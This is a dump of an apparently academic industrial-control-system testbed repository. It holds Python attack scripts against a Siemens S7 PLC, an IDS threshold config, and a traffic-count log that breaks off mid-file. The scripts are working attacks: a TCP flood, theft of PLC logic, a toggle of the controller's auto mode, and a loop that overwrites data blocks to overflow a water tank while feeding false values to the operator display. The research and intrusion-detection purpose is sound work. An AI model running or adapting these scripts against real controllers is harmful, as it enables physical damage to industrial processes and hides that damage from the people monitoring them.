├── Attack-Scripts
├── dos.py
├── get_logic.py
├── write-to-various-areas.py
└── write.py
├── Example-Files
├── IDS_CONFIG.txt
├── config_file_information.txt
└── my_logs.txt
├── Experiment Setup.png
├── IDS
├── Config.py
├── S7Packet.py
├── aggregate_traffic.py
├── ids.py
└── my_siem.py
├── README.md
├── System Architecture.png
└── Value Tampering Detection.png
/Attack-Scripts/dos.py:
--------------------------------------------------------------------------------
1 | """
2 | File: dos.py
3 | Performs a simple TCP Denial of Service against the PLC's web interface.
4 | Change IP on line 12 as appropriate.
5 | """
6 | __author__ = 'William Jardine'
7 |
8 | import socket, sys, os
9 |
10 | for i in range(1, 10000):
11 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
12 | s.connect(('192.168.0.101', 102))
13 | print "TCP packet sent to PLC"
14 | s.send("DoSing the PLC\r\n")
15 | s.close()
16 |
--------------------------------------------------------------------------------
/Attack-Scripts/get_logic.py:
--------------------------------------------------------------------------------
1 | """
2 | File: get_logic.py
3 | Upload logic code for FB1 (function block 1) from the PLC to the user workstation and print the size of it.
4 | """
5 | __author__ = 'William Jardine'
6 |
7 | import snap7
8 |
9 | ip = '192.168.0.101' # IP of fieldsite 3 PLC
10 | rack = 0
11 | slot = 2
12 |
13 | client = snap7.client.Client()
14 | client.connect(ip, rack, slot)
15 |
16 | (code, size) = client.full_upload("FB", 1)
17 | print "{} bytes of logic code uploaded from {}".format(len(code), ip)
18 |
19 | client.disconnect()
20 |
--------------------------------------------------------------------------------
/Attack-Scripts/write-to-various-areas.py:
--------------------------------------------------------------------------------
1 | """
2 | File: write-to-various-areas.py
3 | Exploit Siemens S7 memory configuration to overflow the water tank and disrupt monitoring.
4 | Write to DB1 to make the function do something (currently writing a Fill value)
5 | Write to DB2 to fool the HMI (currently write a Middle valye)
6 | Can also try writing to MD104 (line 28), but refresh rate is too quick to it for effective results.
7 | """
8 | __author__ = 'William Jardine'
9 |
10 | import snap7
11 | import binascii
12 |
13 | ip = '192.168.0.101' # IP of fieldsite 3 PLC
14 | rack = 0
15 | slot = 2
16 |
17 | client = snap7.client.Client()
18 | client.connect(ip, rack, slot)
19 |
20 | x = bytearray(b'\xff\xff\xff\xff')
21 | y = bytearray(b'\x42\x8e\x3f\x1d') # uncomment this to fool HMI
22 |
23 |
24 | while True:
25 | print("writing {}".format(binascii.hexlify(x)))
26 | client.db_write(1,2,x) # uncomment this to attack process
27 | client.db_write(2,2,y) # uncomment this to fool HMI - this is same purpose as MD104 but not overwritten
28 | #client.write_area(snap7.types.areas['MK'], 0, 104, x)
29 |
30 | client.disconnect()
31 |
--------------------------------------------------------------------------------
/Attack-Scripts/write.py:
--------------------------------------------------------------------------------
1 | """
2 | File: write.py
3 | Writes 1 to DB1.DBX0.1, which turns on auto mode (this is specific to Lancaster's ICS testbed setup - will vary system to system!).
4 | Add the argument -reset to reset bits back to 0 and turn it back off.
5 | """
6 | __author__ = 'William Jardine'
7 |
8 | import snap7
9 | import binascii
10 | import sys
11 |
12 | ip = '192.168.0.101' # IP of fieldsite 3 PLC
13 | rack = 0
14 | slot = 2
15 |
16 | client = snap7.client.Client()
17 | client.connect(ip, rack, slot)
18 |
19 | x = bytearray(b'\x02') # write 00000010 to turn on auto mode (DB1.DBX0.1)
20 | if len(sys.argv) > 1 and sys.argv[1] == "-reset":
21 | x = bytearray(b'\x00')
22 |
23 | print("writing {}".format(binascii.hexlify(x)))
24 | client.db_write(1,0,x) # writing to byte 5 in data block 1s
25 |
26 | client.disconnect()
27 |
--------------------------------------------------------------------------------
/Example-Files/IDS_CONFIG.txt:
--------------------------------------------------------------------------------
1 | IDS_CONFIG:192.168.0.101
2 |
3 | >Levels (#Levels for low, normal and high by function code per 30 seconds# Function:Low/High, where normal >= Low and <= High)
4 | Read:50/140
5 | Write:0/4
6 | StartUpload:0/0
7 | Upload:0/0
8 | EndUpload:0/0
9 | Other:10/200
10 |
11 | >IPs (#IPs expected to be involved# Function:xxx.xxx.xxx.xxx;yyy.yyy.yyy.yyy)
12 | Read:192.168.0.101;192.168.0.100;192.168.0.12
13 | Write:192.168.0.101;192.168.0.100;192.168.0.12
14 | StartUpload:
15 | Upload:
16 | EndUpload:
17 | Other:192.168.0.101;192.168.0.100;192.168.0.12
18 |
19 | >Times (#Times high number of packets are expected to arrive at normally# 61 means always, otherwise values are comma separated)
20 | Read:61
21 | Write:00,05,10
22 | StartUpload:50
23 | Upload:50
24 | EndUpload:50
25 | Other:61
26 |
--------------------------------------------------------------------------------
/Example-Files/config_file_information.txt:
--------------------------------------------------------------------------------
1 | TITLE: config_file_information
2 |
3 | ATTRIBUTE: functionCode
4 | ATTRIBUTE: packetsPerThirtySecsOfThisType
5 | ATTRIBUTE: 5MinuteTimeInterval
6 | ATTRIBUTE: srcIP
7 | ATTRIBUTE: dstIP
8 |
9 | Read,133,0,172.16.0.199,192.168.2.101
10 | Read,60,0,192.168.2.201,192.168.2.101
11 |
12 | Other,61,0,172.16.0.199,192.168.2.101
13 | Other,60,0,192.168.2.201,192.168.2.101
14 |
15 | Read,133,0,172.16.0.199,192.168.2.101
16 | Read,58,0,192.168.2.201,192.168.2.101
17 |
18 | Other,62,0,192.168.2.201,192.168.2.101
19 | Other,60,0,172.16.0.199,192.168.2.101
20 |
21 | Read,133,0,172.16.0.199,192.168.2.101
22 | Read,60,0,192.168.2.201,192.168.2.101
23 |
24 | Other,61,0,192.168.2.201,192.168.2.101
25 | Other,60,0,172.16.0.199,192.168.2.101
26 | Other,10,0,172.16.0.200,192.168.2.101
27 |
28 | Read,133,5,172.16.0.199,192.168.2.101
29 | Read,60,5,192.168.2.201,192.168.2.101
30 |
31 | Other,61,5,172.16.0.199,192.168.2.101
32 | Other,61,5,192.168.2.201,192.168.2.101
33 |
34 | Read,133,5,172.16.0.199,192.168.2.101
35 | Read,60,5,192.168.2.201,192.168.2.101
36 |
37 | Other,61,5,172.16.0.199,192.168.2.101
38 | Other,62,5,192.168.2.201,192.168.2.101
39 |
40 | Read,133,5,172.16.0.199,192.168.2.101
41 | Read,60,5,192.168.2.201,192.168.2.101
42 |
43 | Other,61,5,172.16.0.199,192.168.2.101
44 | Other,60,5,192.168.2.201,192.168.2.101
45 |
46 | Read,133,5,172.16.0.199,192.168.2.101
47 | Read,58,5,192.168.2.201,192.168.2.101
48 |
49 | Other,62,5,172.16.0.199,192.168.2.101
50 | Other,60,5,192.168.2.201,192.168.2.101
51 |
52 | Read,134,5,172.16.0.199,192.168.2.101
53 | Read,60,5,192.168.2.201,192.168.2.101
54 |
55 | Other,62,5,192.168.2.201,192.168.2.101
56 | Other,60,5,172.16.0.199,192.168.2.101
57 |
58 | Read,133,5,192.168.2.101,172.16.0.199
59 | Read,60,5,192.168.2.201,192.168.2.101
60 |
61 | Other,61,5,172.16.0.199,192.168.2.101
62 | Other,62,5,192.168.2.201,192.168.2.101
63 | Other,10,5,172.16.0.200,192.168.2.101
64 |
65 | Read,134,5,192.168.2.101,172.16.0.199
66 | Read,60,5,192.168.2.201,192.168.2.101
67 |
68 | Other,61,5,172.16.0.199,192.168.2.101
69 | Other,62,5,192.168.2.201,192.168.2.101
70 |
71 | Read,133,5,172.16.0.199,192.168.2.101
72 | Read,60,5,192.168.2.201,192.168.2.101
73 |
74 | Other,62,5,172.16.0.199,192.168.2.101
75 | Other,62,5,192.168.2.201,192.168.2.101
76 |
77 | Read,133,5,172.16.0.199,192.168.2.101
78 | Read,58,5,192.168.2.201,192.168.2.101
79 |
80 | Other,64,5,172.16.0.199,192.168.2.101
81 | Other,58,5,192.168.2.201,192.168.2.101
82 |
83 | Read,61,5,192.168.2.201,192.168.2.101
84 | Read,132,5,172.16.0.199,192.168.2.101
85 |
86 | Other,63,5,192.168.2.201,192.168.2.101
87 | Other,63,5,172.16.0.199,192.168.2.101
88 | Other,10,5,172.16.0.200,192.168.2.101
89 |
90 | Read,61,10,192.168.2.201,192.168.2.101
91 | Read,132,10,172.16.0.199,192.168.2.101
92 |
93 | Other,63,10,172.16.0.199,192.168.2.101
94 | Other,60,10,192.168.2.201,192.168.2.101
95 |
96 | Read,61,10,192.168.2.201,192.168.2.101
97 | Read,132,10,172.16.0.199,192.168.2.101
98 |
99 | Other,61,10,172.16.0.199,192.168.2.101
100 | Other,61,10,192.168.2.201,192.168.2.101
101 |
102 | Read,133,10,172.16.0.199,192.168.2.101
103 | Read,60,10,192.168.2.201,192.168.2.101
104 |
105 | Other,62,10,172.16.0.199,192.168.2.101
106 | Other,61,10,192.168.2.201,192.168.2.101
107 |
108 | Read,133,10,172.16.0.199,192.168.2.101
109 | Read,60,10,192.168.2.201,192.168.2.101
110 |
111 | Other,62,10,172.16.0.199,192.168.2.101
112 | Other,61,10,192.168.2.201,192.168.2.101
113 |
114 | Read,133,10,172.16.0.199,192.168.2.101
115 | Read,58,10,192.168.2.201,192.168.2.101
116 |
117 | Other,61,10,172.16.0.199,192.168.2.101
118 | Other,59,10,192.168.2.201,192.168.2.101
119 |
120 | Read,61,10,192.168.2.201,192.168.2.101
121 | Read,132,10,172.16.0.199,192.168.2.101
122 |
123 | Other,61,10,172.16.0.199,192.168.2.101
124 | Other,61,10,192.168.2.201,192.168.2.101
125 | Other,10,10,172.16.0.200,192.168.2.101
126 |
127 | Read,61,10,192.168.2.201,192.168.2.101
128 | Read,132,10,172.16.0.199,192.168.2.101
129 |
130 | Other,61,10,172.16.0.199,192.168.2.101
131 | Other,61,10,192.168.2.201,192.168.2.101
132 |
133 | Read,133,10,172.16.0.199,192.168.2.101
134 | Read,60,10,192.168.2.201,192.168.2.101
135 |
136 | Other,61,10,172.16.0.199,192.168.2.101
137 | Other,62,10,192.168.2.201,192.168.2.101
138 |
139 | Read,133,10,172.16.0.199,192.168.2.101
140 | Read,60,10,192.168.2.201,192.168.2.101
141 |
142 | Other,61,10,172.16.0.199,192.168.2.101
143 | Other,60,10,192.168.2.201,192.168.2.101
144 |
145 | Read,133,10,172.16.0.199,192.168.2.101
146 | Read,58,10,192.168.2.201,192.168.2.101
147 |
148 | Other,62,10,172.16.0.199,192.168.2.101
149 | Other,61,10,192.168.2.101,192.168.2.201
150 | Other,10,10,172.16.0.200,192.168.2.101
151 |
152 | Read,61,15,192.168.2.201,192.168.2.101
153 | Read,132,15,172.16.0.199,192.168.2.101
154 |
155 | Other,62,15,192.168.2.201,192.168.2.101
156 | Other,61,15,172.16.0.199,192.168.2.101
157 |
158 | Read,133,15,172.16.0.199,192.168.2.101
159 | Read,60,15,192.168.2.201,192.168.2.101
160 |
161 | Other,63,15,192.168.2.201,192.168.2.101
162 | Other,60,15,172.16.0.199,192.168.2.101
163 |
164 | Read,133,15,172.16.0.199,192.168.2.101
165 | Read,60,15,192.168.2.201,192.168.2.101
166 |
167 | Other,61,15,172.16.0.199,192.168.2.101
168 | Other,60,15,192.168.2.201,192.168.2.101
169 |
170 | Read,133,15,172.16.0.199,192.168.2.101
171 | Read,60,15,192.168.2.201,192.168.2.101
172 |
173 | Other,64,15,172.16.0.199,192.168.2.101
174 | Other,61,15,192.168.2.201,192.168.2.101
175 |
176 | Read,133,15,172.16.0.199,192.168.2.101
177 | Read,58,15,192.168.2.201,192.168.2.101
178 |
179 | Other,66,15,172.16.0.199,192.168.2.101
180 | Other,59,15,192.168.2.201,192.168.2.101
181 |
182 | Read,61,15,192.168.2.201,192.168.2.101
183 | Read,132,15,172.16.0.199,192.168.2.101
184 | Write,17,15,192.168.2.201,192.168.2.101
185 |
186 | Other,77,15,192.168.2.201,192.168.2.101
187 | Other,66,15,172.16.0.199,192.168.2.101
188 | Other,6,15,172.16.0.200,192.168.2.101
189 |
190 | Read,133,15,172.16.0.199,192.168.2.101
191 | Read,60,15,192.168.2.201,192.168.2.101
192 | Write,21,15,192.168.2.201,192.168.2.101
193 |
194 | Other,82,15,192.168.2.201,192.168.2.101
195 | Other,74,15,172.16.0.199,192.168.2.101
196 | Other,4,15,172.16.0.200,192.168.2.101
197 |
198 | Read,133,15,172.16.0.199,192.168.2.101
199 | Read,60,15,192.168.2.201,192.168.2.101
200 |
201 | Other,78,15,172.16.0.199,192.168.2.101
202 | Other,62,15,192.168.2.201,192.168.2.101
203 |
204 | Read,133,15,172.16.0.199,192.168.2.101
205 | Read,60,15,192.168.2.201,192.168.2.101
206 | Write,37,15,192.168.2.201,192.168.2.101
207 |
208 | Other,80,15,172.16.0.199,192.168.2.101
209 | Other,96,15,192.168.2.201,192.168.2.101
210 |
211 | Read,133,15,172.16.0.199,192.168.2.101
212 | Read,58,15,192.168.2.201,192.168.2.101
213 |
214 | Other,76,15,172.16.0.199,192.168.2.101
215 | Other,60,15,192.168.2.201,192.168.2.101
216 | Other,10,15,172.16.0.200,192.168.2.101
217 |
218 | Read,61,20,192.168.2.201,192.168.2.101
219 | Read,132,20,172.16.0.199,192.168.2.101
220 |
221 | Other,63,20,192.168.2.201,192.168.2.101
222 | Other,78,20,172.16.0.199,192.168.2.101
223 |
224 | Read,133,20,172.16.0.199,192.168.2.101
225 | Read,60,20,192.168.2.201,192.168.2.101
226 |
227 | Other,63,20,192.168.2.201,192.168.2.101
228 | Other,75,20,172.16.0.199,192.168.2.101
229 |
230 | Read,133,20,172.16.0.199,192.168.2.101
231 | Read,60,20,192.168.2.201,192.168.2.101
232 |
233 | Other,78,20,172.16.0.199,192.168.2.101
234 | Other,60,20,192.168.2.201,192.168.2.101
235 |
236 | Read,133,20,172.16.0.199,192.168.2.101
237 | Read,60,20,192.168.2.201,192.168.2.101
238 |
239 | Other,74,20,172.16.0.199,192.168.2.101
240 | Other,62,20,192.168.2.201,192.168.2.101
241 |
242 | Read,133,20,172.16.0.199,192.168.2.101
243 | Read,58,20,192.168.2.201,192.168.2.101
244 |
245 | Other,67,20,172.16.0.199,192.168.2.101
246 | Other,59,20,192.168.2.201,192.168.2.101
247 |
248 | Read,61,20,192.168.2.201,192.168.2.101
249 | Read,132,20,172.16.0.199,192.168.2.101
250 |
251 | Other,63,20,192.168.2.201,192.168.2.101
252 | Other,61,20,172.16.0.199,192.168.2.101
253 |
254 | Read,133,20,172.16.0.199,192.168.2.101
255 | Read,60,20,192.168.2.201,192.168.2.101
256 |
257 | Other,62,20,192.168.2.201,192.168.2.101
258 | Other,60,20,172.16.0.199,192.168.2.101
259 | Other,10,20,172.16.0.200,192.168.2.101
260 |
261 | Read,134,20,172.16.0.199,192.168.2.101
262 | Read,60,20,192.168.2.201,192.168.2.101
263 |
264 | Other,61,20,172.16.0.199,192.168.2.101
265 | Other,62,20,192.168.2.201,192.168.2.101
266 |
267 | Read,134,20,192.168.2.101,172.16.0.199
268 | Read,60,20,192.168.2.201,192.168.2.101
269 |
270 | Other,61,20,172.16.0.199,192.168.2.101
271 | Other,62,20,192.168.2.201,192.168.2.101
272 |
273 | Read,133,20,172.16.0.199,192.168.2.101
274 | Read,60,20,192.168.2.201,192.168.2.101
275 |
276 | Other,61,20,172.16.0.199,192.168.2.101
277 | Other,62,20,192.168.2.201,192.168.2.101
278 | Other,10,20,172.16.0.200,192.168.2.101
279 |
280 | Read,133,25,172.16.0.199,192.168.2.101
281 | Read,58,25,192.168.2.201,192.168.2.101
282 |
283 | Other,61,25,172.16.0.199,192.168.2.101
284 | Other,59,25,192.168.2.201,192.168.2.101
285 |
286 | Read,61,25,192.168.2.201,192.168.2.101
287 | Read,132,25,172.16.0.199,192.168.2.101
288 |
289 | Other,62,25,192.168.2.201,192.168.2.101
290 | Other,60,25,172.16.0.199,192.168.2.101
291 |
292 | Read,61,25,192.168.2.201,192.168.2.101
293 | Read,132,25,172.16.0.199,192.168.2.101
294 |
295 | Other,61,25,172.16.0.199,192.168.2.101
296 | Other,62,25,192.168.2.201,192.168.2.101
297 |
298 | Read,133,25,172.16.0.199,192.168.2.101
299 | Read,60,25,192.168.2.201,192.168.2.101
300 |
301 | Other,61,25,172.16.0.199,192.168.2.101
302 | Other,60,25,192.168.2.201,192.168.2.101
303 |
304 | Read,133,25,172.16.0.199,192.168.2.101
305 | Read,60,25,192.168.2.201,192.168.2.101
306 |
307 | Other,61,25,172.16.0.199,192.168.2.101
308 | Other,61,25,192.168.2.201,192.168.2.101
309 |
310 | Read,133,25,172.16.0.199,192.168.2.101
311 | Read,58,25,192.168.2.201,192.168.2.101
312 |
313 | Other,61,25,172.16.0.199,192.168.2.101
314 | Other,61,25,192.168.2.201,192.168.2.101
315 |
316 | Read,133,25,172.16.0.199,192.168.2.101
317 | Read,58,25,192.168.2.201,192.168.2.101
318 |
319 | Other,61,25,172.16.0.199,192.168.2.101
320 | Other,60,25,192.168.2.201,192.168.2.101
321 | Other,10,25,172.16.0.200,192.168.2.101
322 |
323 | Read,133,25,172.16.0.199,192.168.2.101
324 | Read,58,25,192.168.2.201,192.168.2.101
325 |
326 | Other,61,25,172.16.0.199,192.168.2.101
327 | Other,61,25,192.168.2.201,192.168.2.101
328 |
329 | Read,133,25,172.16.0.199,192.168.2.101
330 | Read,60,25,192.168.2.201,192.168.2.101
331 |
332 | Other,61,25,172.16.0.199,192.168.2.101
333 | Other,61,25,192.168.2.201,192.168.2.101
334 |
335 | Read,133,25,172.16.0.199,192.168.2.101
336 | Read,58,25,192.168.2.201,192.168.2.101
337 |
338 | Other,60,25,192.168.2.101,192.168.2.201
339 | Other,60,25,172.16.0.199,192.168.2.101
340 | Other,10,25,172.16.0.200,192.168.2.101
341 |
342 | Read,133,30,172.16.0.199,192.168.2.101
343 | Read,60,30,192.168.2.201,192.168.2.101
344 |
345 | Other,61,30,172.16.0.199,192.168.2.101
346 | Other,62,30,192.168.2.201,192.168.2.101
347 |
348 | Read,133,30,172.16.0.199,192.168.2.101
349 | Read,58,30,192.168.2.201,192.168.2.101
350 |
351 | Other,61,30,172.16.0.199,192.168.2.101
352 | Other,61,30,192.168.2.201,192.168.2.101
353 |
354 | Read,61,30,192.168.2.201,192.168.2.101
355 | Read,132,30,172.16.0.199,192.168.2.101
356 |
357 | Other,61,30,172.16.0.199,192.168.2.101
358 | Other,61,30,192.168.2.201,192.168.2.101
359 |
360 | Read,133,30,172.16.0.199,192.168.2.101
361 | Read,60,30,192.168.2.201,192.168.2.101
362 |
363 | Other,62,30,172.16.0.199,192.168.2.101
364 | Other,61,30,192.168.2.201,192.168.2.101
365 |
366 | Read,133,30,172.16.0.199,192.168.2.101
367 | Read,58,30,192.168.2.201,192.168.2.101
368 |
369 | Other,61,30,172.16.0.199,192.168.2.101
370 | Other,60,30,192.168.2.201,192.168.2.101
371 |
372 | Read,61,30,192.168.2.201,192.168.2.101
373 | Read,132,30,172.16.0.199,192.168.2.101
374 |
375 | Other,64,30,192.168.2.101,192.168.2.201
376 | Other,60,30,172.16.0.199,192.168.2.101
377 |
378 | Read,133,30,172.16.0.199,192.168.2.101
379 | Read,60,30,192.168.2.201,192.168.2.101
380 |
381 | Other,62,30,192.168.2.201,192.168.2.101
382 | Other,60,30,172.16.0.199,192.168.2.101
383 | Other,10,30,172.16.0.200,192.168.2.101
384 |
385 | Read,133,30,172.16.0.199,192.168.2.101
386 | Read,58,30,192.168.2.201,192.168.2.101
387 |
388 | Other,61,30,192.168.2.101,192.168.2.201
389 | Other,60,30,172.16.0.199,192.168.2.101
390 |
391 | Read,133,30,172.16.0.199,192.168.2.101
392 | Read,60,30,192.168.2.201,192.168.2.101
393 |
394 | Other,61,30,192.168.2.201,192.168.2.101
395 | Other,60,30,172.16.0.199,192.168.2.101
396 |
397 | Read,133,30,172.16.0.199,192.168.2.101
398 | Read,58,30,192.168.2.201,192.168.2.101
399 |
400 | Other,61,30,172.16.0.199,192.168.2.101
401 | Other,59,30,192.168.2.201,192.168.2.101
402 | Other,10,30,172.16.0.200,192.168.2.101
403 |
404 | Read,61,35,192.168.2.201,192.168.2.101
405 | Read,132,35,172.16.0.199,192.168.2.101
406 |
407 | Other,62,35,192.168.2.201,192.168.2.101
408 | Other,60,35,172.16.0.199,192.168.2.101
409 |
410 | Read,133,35,172.16.0.199,192.168.2.101
411 | Read,60,35,192.168.2.201,192.168.2.101
412 |
413 | Other,61,35,172.16.0.199,192.168.2.101
414 | Other,62,35,192.168.2.201,192.168.2.101
415 |
416 | Read,133,35,172.16.0.199,192.168.2.101
417 | Read,58,35,192.168.2.201,192.168.2.101
418 |
419 | Other,61,35,172.16.0.199,192.168.2.101
420 | Other,60,35,192.168.2.201,192.168.2.101
421 |
422 | Read,61,35,192.168.2.201,192.168.2.101
423 | Read,132,35,172.16.0.199,192.168.2.101
424 |
425 | Other,63,35,192.168.2.201,192.168.2.101
426 | Other,60,35,172.16.0.199,192.168.2.101
427 |
428 | Read,133,35,172.16.0.199,192.168.2.101
429 | Read,60,35,192.168.2.201,192.168.2.101
430 |
431 | Other,61,35,172.16.0.199,192.168.2.101
432 | Other,61,35,192.168.2.201,192.168.2.101
433 |
434 | Read,133,35,172.16.0.199,192.168.2.101
435 | Read,58,35,192.168.2.201,192.168.2.101
436 |
437 | Other,62,35,172.16.0.199,192.168.2.101
438 | Other,61,35,192.168.2.201,192.168.2.101
439 |
440 | Read,133,35,172.16.0.199,192.168.2.101
441 | Read,60,35,192.168.2.201,192.168.2.101
442 |
443 | Other,61,35,192.168.2.201,192.168.2.101
444 | Other,60,35,172.16.0.199,192.168.2.101
445 | Other,10,35,172.16.0.200,192.168.2.101
446 |
447 | Read,133,35,172.16.0.199,192.168.2.101
448 | Read,58,35,192.168.2.201,192.168.2.101
449 |
450 | Other,61,35,172.16.0.199,192.168.2.101
451 | Other,61,35,192.168.2.201,192.168.2.101
452 |
453 | Read,61,35,192.168.2.201,192.168.2.101
454 | Read,132,35,172.16.0.199,192.168.2.101
455 |
456 | Other,63,35,192.168.2.201,192.168.2.101
457 | Other,60,35,172.16.0.199,192.168.2.101
458 |
459 | Read,133,35,172.16.0.199,192.168.2.101
460 | Read,60,35,192.168.2.201,192.168.2.101
461 |
462 | Other,63,35,172.16.0.199,192.168.2.101
463 | Other,60,35,192.168.2.201,192.168.2.101
464 | Other,10,35,172.16.0.200,192.168.2.101
465 |
466 | Read,133,40,172.16.0.199,192.168.2.101
467 | Read,58,40,192.168.2.201,192.168.2.101
468 |
469 | Other,62,40,192.168.2.101,192.168.2.201
470 | Other,63,40,192.168.2.101,172.16.0.199
471 |
472 | Read,133,40,172.16.0.199,192.168.2.101
473 | Read,60,40,192.168.2.201,192.168.2.101
474 |
475 | Other,61,40,192.168.2.201,192.168.2.101
476 | Other,61,40,172.16.0.199,192.168.2.101
477 |
478 | Read,133,40,172.16.0.199,192.168.2.101
479 | Read,58,40,192.168.2.201,192.168.2.101
480 |
481 | Other,64,40,192.168.2.101,172.16.0.199
482 | Other,58,40,192.168.2.201,192.168.2.101
483 |
484 | Read,133,40,172.16.0.199,192.168.2.101
485 | Read,60,40,192.168.2.201,192.168.2.101
486 |
487 | Other,64,40,192.168.2.101,172.16.0.199
488 | Other,61,40,192.168.2.201,192.168.2.101
489 |
490 | Read,134,40,172.16.0.199,192.168.2.101
491 | Read,60,40,192.168.2.201,192.168.2.101
492 |
493 | Other,64,40,192.168.2.101,172.16.0.199
494 | Other,62,40,192.168.2.201,192.168.2.101
495 |
496 | Read,134,40,192.168.2.101,172.16.0.199
497 | Read,58,40,192.168.2.201,192.168.2.101
498 | StartUpload,17,40,192.168.2.4,192.168.2.101
499 | Upload,31,40,192.168.2.4,192.168.2.101
500 | EndUpload,17,40,192.168.2.4,192.168.2.101
501 |
502 | Other,62,40,172.16.0.199,192.168.2.101
503 | Other,60,40,192.168.2.101,192.168.2.201
504 | Other,131,40,192.168.2.4,192.168.2.101
505 |
506 | Read,132,40,172.16.0.199,192.168.2.101
507 | Read,60,40,192.168.2.201,192.168.2.101
508 | StartUpload,58,40,192.168.2.4,192.168.2.101
509 | Upload,83,40,192.168.2.4,192.168.2.101
510 | EndUpload,57,40,192.168.2.4,192.168.2.101
511 |
512 | Other,64,40,192.168.2.101,172.16.0.199
513 | Other,222,40,192.168.2.4,192.168.2.101
514 | Other,62,40,192.168.2.201,192.168.2.101
515 | Other,10,40,172.16.0.200,192.168.2.101
516 |
517 | Read,134,40,192.168.2.101,172.16.0.199
518 | Read,58,40,192.168.2.201,192.168.2.101
519 |
520 | Other,61,40,172.16.0.199,192.168.2.101
521 | Other,58,40,192.168.2.201,192.168.2.101
522 |
523 | Read,61,40,192.168.2.201,192.168.2.101
524 | Read,133,40,172.16.0.199,192.168.2.101
525 |
526 | Other,64,40,192.168.2.101,172.16.0.199
527 | Other,63,40,192.168.2.101,192.168.2.201
528 |
529 | Read,133,40,192.168.2.101,172.16.0.199
530 | Read,60,40,192.168.2.201,192.168.2.101
531 |
532 | Other,63,40,192.168.2.101,172.16.0.199
533 | Other,61,40,192.168.2.201,192.168.2.101
534 | Other,10,40,172.16.0.200,192.168.2.101
535 |
536 | Read,133,45,192.168.2.101,172.16.0.199
537 | Read,60,45,192.168.2.201,192.168.2.101
538 |
539 | Other,61,45,172.16.0.199,192.168.2.101
540 | Other,61,45,192.168.2.201,192.168.2.101
541 |
542 | Read,133,45,192.168.2.101,172.16.0.199
543 | Read,60,45,192.168.2.201,192.168.2.101
544 |
545 | Other,61,45,172.16.0.199,192.168.2.101
546 | Other,61,45,192.168.2.201,192.168.2.101
547 |
548 | Read,134,45,192.168.2.101,172.16.0.199
549 | Read,58,45,192.168.2.201,192.168.2.101
550 |
551 | Other,62,45,172.16.0.199,192.168.2.101
552 | Other,60,45,192.168.2.201,192.168.2.101
553 |
554 | Read,61,45,192.168.2.201,192.168.2.101
555 | Read,132,45,172.16.0.199,192.168.2.101
556 |
557 | Other,63,45,192.168.2.201,192.168.2.101
558 | Other,60,45,172.16.0.199,192.168.2.101
559 |
560 | Read,61,45,192.168.2.201,192.168.2.101
561 | Read,132,45,172.16.0.199,192.168.2.101
562 | Write,13,45,192.168.2.201,192.168.2.101
563 |
564 | Other,61,45,172.16.0.199,192.168.2.101
565 | Other,73,45,192.168.2.201,192.168.2.101
566 |
567 | Read,133,45,172.16.0.199,192.168.2.101
568 | Read,60,45,192.168.2.201,192.168.2.101
569 | Write,9,45,192.168.2.201,192.168.2.101
570 |
571 | Other,61,45,172.16.0.199,192.168.2.101
572 | Other,71,45,192.168.2.101,192.168.2.201
573 |
574 | Read,133,45,172.16.0.199,192.168.2.101
575 | Read,58,45,192.168.2.201,192.168.2.101
576 | Write,41,45,192.168.2.201,192.168.2.101
577 |
578 | Other,65,45,172.16.0.199,192.168.2.101
579 | Other,99,45,192.168.2.201,192.168.2.101
580 | Other,10,45,172.16.0.200,192.168.2.101
581 |
582 | Read,61,45,192.168.2.201,192.168.2.101
583 | Read,132,45,172.16.0.199,192.168.2.101
584 | Write,3,45,192.168.2.201,192.168.2.101
585 |
586 | Other,63,45,192.168.2.201,192.168.2.101
587 | Other,70,45,172.16.0.199,192.168.2.101
588 |
589 | Read,61,45,192.168.2.201,192.168.2.101
590 | Read,132,45,172.16.0.199,192.168.2.101
591 |
592 | Other,76,45,172.16.0.199,192.168.2.101
593 | Other,62,45,192.168.2.201,192.168.2.101
594 |
595 | Read,61,45,192.168.2.201,192.168.2.101
596 | Read,132,45,172.16.0.199,192.168.2.101
597 |
598 | Other,77,45,172.16.0.199,192.168.2.101
599 | Other,61,45,192.168.2.201,192.168.2.101
600 | Other,10,45,172.16.0.200,192.168.2.101
601 |
602 | Read,133,50,172.16.0.199,192.168.2.101
603 | Read,60,50,192.168.2.201,192.168.2.101
604 |
605 | Other,76,50,172.16.0.199,192.168.2.101
606 | Other,61,50,192.168.2.201,192.168.2.101
607 |
608 | Read,133,50,172.16.0.199,192.168.2.101
609 | Read,60,50,192.168.2.201,192.168.2.101
610 |
611 | Other,77,50,172.16.0.199,192.168.2.101
612 | Other,62,50,192.168.2.201,192.168.2.101
613 |
614 | Read,133,50,172.16.0.199,192.168.2.101
615 | Read,58,50,192.168.2.201,192.168.2.101
616 |
617 | Other,76,50,172.16.0.199,192.168.2.101
618 | Other,60,50,192.168.2.201,192.168.2.101
619 |
620 | Read,61,50,192.168.2.201,192.168.2.101
621 | Read,132,50,172.16.0.199,192.168.2.101
622 |
623 | Other,76,50,172.16.0.199,192.168.2.101
624 | Other,61,50,192.168.2.201,192.168.2.101
625 |
626 | Read,61,50,192.168.2.201,192.168.2.101
627 | Read,132,50,172.16.0.199,192.168.2.101
628 |
629 | Other,78,50,172.16.0.199,192.168.2.101
630 | Other,62,50,192.168.2.201,192.168.2.101
631 |
632 | Read,133,50,172.16.0.199,192.168.2.101
633 | Read,60,50,192.168.2.201,192.168.2.101
634 |
635 | Other,74,50,172.16.0.199,192.168.2.101
636 | Other,62,50,192.168.2.201,192.168.2.101
637 |
638 | Read,133,50,172.16.0.199,192.168.2.101
639 | Read,60,50,192.168.2.201,192.168.2.101
640 |
641 | Other,67,50,172.16.0.199,192.168.2.101
642 | Other,61,50,192.168.2.201,192.168.2.101
643 | Other,10,50,172.16.0.200,192.168.2.101
644 |
645 | Read,133,50,172.16.0.199,192.168.2.101
646 | Read,58,50,192.168.2.201,192.168.2.101
647 |
648 | Other,66,50,172.16.0.199,192.168.2.101
649 | Other,59,50,192.168.2.201,192.168.2.101
650 |
651 | Read,61,50,192.168.2.201,192.168.2.101
652 | Read,132,50,172.16.0.199,192.168.2.101
653 |
654 | Other,63,50,192.168.2.201,192.168.2.101
655 | Other,60,50,172.16.0.199,192.168.2.101
656 |
657 | Read,61,50,192.168.2.201,192.168.2.101
658 | Read,132,50,172.16.0.199,192.168.2.101
659 |
660 | Other,62,50,192.168.2.201,192.168.2.101
661 | Other,60,50,172.16.0.199,192.168.2.101
662 | Other,10,50,172.16.0.200,192.168.2.101
663 |
664 | Read,133,55,172.16.0.199,192.168.2.101
